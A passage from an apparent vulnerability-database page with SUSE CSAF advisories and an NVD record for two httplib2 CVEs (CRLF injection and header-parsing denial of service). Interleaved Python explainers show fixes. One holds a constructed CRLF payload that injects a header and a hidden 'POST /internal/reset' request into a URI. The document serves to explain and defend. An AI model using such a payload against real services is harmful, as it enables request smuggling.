body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-19T11:34:19Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. 
This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-19T11:34:19Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
suse-su-2021:1779-1
Vulnerability from csaf_suse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- update to 0.17.3:\n * bugfixes\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- 
version update to 0.13.1\n 0.13.1\n * Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - 
no_proxy=foo.bar will only skip proxy for exact hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n - httplib2 started to use certifi and this is already bent to\n use system certificate bundle.\n ", title: "Description of the patch", }, { category: "details", text: "SUSE-2021-1779,SUSE-OpenStack-Cloud-9-2021-1779,SUSE-OpenStack-Cloud-Crowbar-9-2021-1779", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_1779-1.json", }, { category: "self", summary: "URL for SUSE-SU-2021:1779-1", url: "https://www.suse.com/support/update/announcement/2021/suse-su-20211779-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2021:1779-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2021-May/008868.html", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: 
"2021-05-27T09:44:14Z", generator: { date: "2021-05-27T09:44:14Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2021:1779-1", initial_release_date: "2021-05-27T09:44:14Z", revision_history: [ { date: "2021-05-27T09:44:14Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python-httplib2-0.19.0-8.3.4.noarch", product: { name: "python-httplib2-0.19.0-8.3.4.noarch", product_id: "python-httplib2-0.19.0-8.3.4.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-8.3.4.noarch", product: { name: "python3-httplib2-0.19.0-8.3.4.noarch", product_id: "python3-httplib2-0.19.0-8.3.4.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE OpenStack Cloud 9", product: { name: "SUSE OpenStack Cloud 9", product_id: "SUSE OpenStack Cloud 9", product_identification_helper: { cpe: "cpe:/o:suse:suse-openstack-cloud:9", }, }, }, { category: "product_name", name: "SUSE OpenStack Cloud Crowbar 9", product: { name: "SUSE OpenStack Cloud Crowbar 9", product_id: "SUSE OpenStack Cloud Crowbar 9", product_identification_helper: { cpe: "cpe:/o:suse:suse-openstack-cloud-crowbar:9", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-8.3.4.noarch as component of SUSE OpenStack Cloud 9", product_id: "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", }, product_reference: "python-httplib2-0.19.0-8.3.4.noarch", relates_to_product_reference: "SUSE OpenStack Cloud 9", }, { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-8.3.4.noarch as component of SUSE OpenStack Cloud Crowbar 9", product_id: "SUSE OpenStack Cloud Crowbar 
9:python-httplib2-0.19.0-8.3.4.noarch", }, product_reference: "python-httplib2-0.19.0-8.3.4.noarch", relates_to_product_reference: "SUSE OpenStack Cloud Crowbar 9", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-27T09:44:14Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE 
CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-27T09:44:14Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
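The advisories above bundle CVE-2020-11078 with CVE-2021-21240 and describe it only in one sentence: a caller who builds the URI for `httplib2.Http.request()` by string concatenation lets attacker-controlled text reach the request line unescaped, and the 0.18.x changelog records the fix as forcing %xx quoting of space, CR and LF. The following is an added example, not httplib2's code, that shows what that looks like on the wire and both ways of closing it. The request serializer is a minimal model of any HTTP/1.1 client, and the host, paths and header names are constructed for the demonstration.

```python
"""
Added example (not httplib2's own code): what CVE-2020-11078 looks like on the
wire when a client writes an unescaped, concatenated URI into the request line,
and the two fixes: percent-encoding the untrusted segment when the URI is
built, and, as a client-side backstop, forcing %xx quoting of space, CR and LF.
The serializer below is a minimal model of an HTTP/1.1 client; the server,
paths and header names are made up for the demonstration.
"""
from urllib.parse import quote

# Constructed attacker input: it closes the request line, injects a header,
# terminates the request head, and starts a second, hidden request.  The
# trailing "X-Pad: " soaks up the " HTTP/1.1" the client appends.
MALICIOUS_SEGMENT = (
    "1 HTTP/1.1\r\n"
    "X-Injected: yes\r\n"
    "\r\n"
    "POST /internal/reset HTTP/1.1\r\n"
    "Host: api.example\r\n"
    "X-Pad: "
)


def serialize_request(method: str, target: str, host: str, headers: dict) -> bytes:
    """Write a request head the way a naive HTTP/1.1 client does: the
    request-target goes into the request line byte-for-byte."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def request_lines(raw: bytes) -> list[str]:
    """Split a byte stream the way a server does (each head ends at an empty
    line) and return the request line of every request it would see."""
    heads = [h for h in raw.split(b"\r\n\r\n") if h]
    return [h.split(b"\r\n", 1)[0].decode("latin-1") for h in heads]


def build_target(base_path: str, untrusted_segment: str) -> str:
    """The right fix at the call site: build the URI from components and
    percent-encode the untrusted part, so it cannot carry SP, CR or LF."""
    return base_path.rstrip("/") + "/" + quote(untrusted_segment, safe="")


def force_quote(target: str) -> str:
    """Client-side backstop in the spirit of the 0.18.x changelog entry
    ("Force %xx quote of space, CR, LF characters in uri"): only the three
    characters that can break out of the request line are encoded, so an
    already-encoded URI is left alone."""
    return target.replace("\r", "%0D").replace("\n", "%0A").replace(" ", "%20")


def demo() -> dict:
    """Return the request lines a server sees for the vulnerable, the
    properly built, and the backstop-quoted variants."""
    vulnerable = serialize_request("GET", "/api/items/" + MALICIOUS_SEGMENT,
                                   "api.example", {"User-Agent": "demo"})
    fixed = serialize_request("GET", build_target("/api/items", MALICIOUS_SEGMENT),
                              "api.example", {"User-Agent": "demo"})
    backstop = serialize_request("GET", force_quote("/api/items/" + MALICIOUS_SEGMENT),
                                 "api.example", {"User-Agent": "demo"})
    return {
        "vulnerable": request_lines(vulnerable),
        "fixed": request_lines(fixed),
        "backstop": request_lines(backstop),
    }


if __name__ == "__main__":
    for label, lines in demo().items():
        print(f"{label}: {len(lines)} request(s) -> {lines}")
```

The vulnerable variant yields two request lines from one call, the second of which the caller never intended to send; both fixed variants yield one. The backstop alone is what a library can do without knowing the caller's intent; the real fix remains building the URI from quoted components, which is why the CVE text singles out string concatenation.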
fkie_cve-2021-21240
Vulnerability from fkie_nvd
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Vendor | Product | Version
---|---|---
httplib2_project | httplib2 | * (all versions before 0.19.0, per the CPE match below)
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:httplib2_project:httplib2:*:*:*:*:*:python:*:*", matchCriteriaId: "D5BA135E-6889-4A5D-88F6-1AD4DBC498BE", versionEndExcluding: "0.19.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", }, { lang: "es", value: "httplib2 es una biblioteca cliente HTTP completa para Python. En httplib2 anterior a la versión 0.19.0, un servidor malicioso que responde con una larga serie de caracteres \"\\xa0\" en el encabezado \"www-authenticate\" puede causar una Denegación de Servicio (CPU quemada mientras analiza el encabezado) del cliente httplib2 que accede a dicho servidor. 
Esto se corrigió en la versión 0.19.0, que contiene una nueva implementación de análisis de encabezados de autenticación usando la biblioteca pyparsing", }, ], id: "CVE-2021-21240", lastModified: "2024-11-21T05:47:50.650", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, source: "security-advisories@github.com", type: "Secondary", }, { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2021-02-08T20:15:12.197", references: [ { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: 
"https://github.com/httplib2/httplib2/pull/182", }, { source: "security-advisories@github.com", tags: [ "Exploit", "Mitigation", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { source: "security-advisories@github.com", tags: [ "Product", "Third Party Advisory", ], url: "https://pypi.org/project/httplib2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/pull/182", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Exploit", "Mitigation", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Product", "Third Party Advisory", ], url: "https://pypi.org/project/httplib2", }, ], sourceIdentifier: "security-advisories@github.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-400", }, ], source: "security-advisories@github.com", type: "Primary", }, ], }
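The record above says the payload was a long run of "\xa0" (U+00A0, no-break space) in the WWW-Authenticate header and that 0.19.0 replaced the regex-based auth-header parsing with a pyparsing grammar. The detail a practitioner wants is why that particular byte: in a Python 3 str pattern, `\s` matches U+00A0, so a whitespace-skipping quantifier consumes the whole run and backtracks through it. The block below is an added example, not httplib2's parser and not the regex it replaced: a single-pass challenge parser for the auth-param form of RFC 7235 (scheme followed by name=value pairs, several challenges separated by commas) that treats only SP and HTAB as whitespace, bounds the input length, and rejects the first unexpected character instead of backtracking. The token68 form (a bare Negotiate blob, for instance) is deliberately reported as malformed; the sample headers are constructed.

```python
"""
Added example (not httplib2's own code): a single-pass WWW-Authenticate
parser that cannot be made to backtrack.  It accepts the auth-param form of
RFC 7235 challenges (scheme followed by name=value pairs, possibly several
challenges separated by commas); the token68 form (e.g. a bare Negotiate
blob) is treated as malformed.  Only SP and HTAB count as whitespace, so a
run of U+00A0 is rejected at the first offending character instead of being
chewed through by a \\s* quantifier.
"""
import re
import string

TCHAR = frozenset("!#$%&'*+-.^_`|~" + string.ascii_letters + string.digits)
OWS = frozenset(" \t")  # RFC 7230 OWS is SP / HTAB only; U+00A0 is not whitespace here


def regex_treats_nbsp_as_space() -> bool:
    """The trap behind the CVE's payload: in a Python 3 str pattern, \\s matches
    U+00A0 (it is Unicode whitespace), so whitespace-skipping quantifiers
    happily consume a long NBSP run and then backtrack through it."""
    return re.fullmatch(r"\s", "\xa0") is not None


def parse_challenges(header: str, max_len: int = 8192) -> list[tuple[str, dict[str, str]]]:
    """Parse a WWW-Authenticate value in O(len(header)) with one scan and no
    regex.  Raises ValueError on malformed input; never revisits a character."""
    if len(header) > max_len:
        raise ValueError(f"header exceeds {max_len} characters")
    pos, n = 0, len(header)

    def skip_ows() -> None:
        nonlocal pos
        while pos < n and header[pos] in OWS:
            pos += 1

    def read_token() -> str:
        nonlocal pos
        start = pos
        while pos < n and header[pos] in TCHAR:
            pos += 1
        if start == pos:
            raise ValueError(f"expected token at offset {pos}, got {header[pos:pos + 1]!r}")
        return header[start:pos]

    def read_quoted_string() -> str:
        nonlocal pos
        pos += 1  # opening DQUOTE
        out = []
        while pos < n:
            ch = header[pos]
            if ch == "\\" and pos + 1 < n:      # quoted-pair
                out.append(header[pos + 1])
                pos += 2
            elif ch == '"':
                pos += 1
                return "".join(out)
            else:
                out.append(ch)
                pos += 1
        raise ValueError("unterminated quoted-string")

    challenges: list[tuple[str, dict[str, str]]] = []
    skip_ows()
    while pos < n:
        scheme = read_token()
        params: dict[str, str] = {}
        skip_ows()
        while pos < n:
            if header[pos] == ",":              # list separator (empty elements allowed)
                pos += 1
                skip_ows()
                continue
            mark = pos
            name = read_token()
            skip_ows()
            if pos < n and header[pos] == "=":  # auth-param
                pos += 1
                skip_ows()
                value = read_quoted_string() if pos < n and header[pos] == '"' else read_token()
                params[name.lower()] = value
                skip_ows()
                if pos < n and header[pos] != ",":
                    raise ValueError(f"unexpected {header[pos]!r} at offset {pos}")
            else:                               # a bare token starts the next challenge
                pos = mark
                break
        challenges.append((scheme, params))
    return challenges


def try_parse(header: str):
    """Return the parsed challenges, or None if the header is malformed."""
    try:
        return parse_challenges(header)
    except ValueError:
        return None


if __name__ == "__main__":
    print(regex_treats_nbsp_as_space())                    # True: the reason \xa0 was the payload
    print(try_parse('Digest realm="r", nonce="n1", qop="auth,auth-int", algorithm=MD5'))
    print(try_parse("Digest " + "\xa0" * 100_000))         # None, immediately
```

Every loop here advances `pos` or raises, so cost is linear in the header length and independent of its content. The length cap is the second defence: even a parser that is linear should not spend its budget on a 100 kB header from an untrusted server.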
opensuse-su-2021:0772-1
Vulnerability from csaf_opensuse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- version update to 0.13.1\n 0.13.1\n * 
Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - no_proxy=foo.bar will only skip proxy for exact 
hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n - Removing certifi patch:\n httplib2 started to use certifi and this is already bent to\n use system certificate bundle by another patch\n\nThis update was imported from the SUSE:SLE-15:Update update project.", title: "Description of the patch", }, { category: "details", text: "openSUSE-2021-772", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2021_0772-1.json", }, { category: "self", summary: "URL for openSUSE-SU-2021:0772-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/ANZIEBB4AJVGYC2KYDE7RDSTFBBTL5ID/", }, { category: "self", summary: "E-Mail link for openSUSE-SU-2021:0772-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/ANZIEBB4AJVGYC2KYDE7RDSTFBBTL5ID/", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: 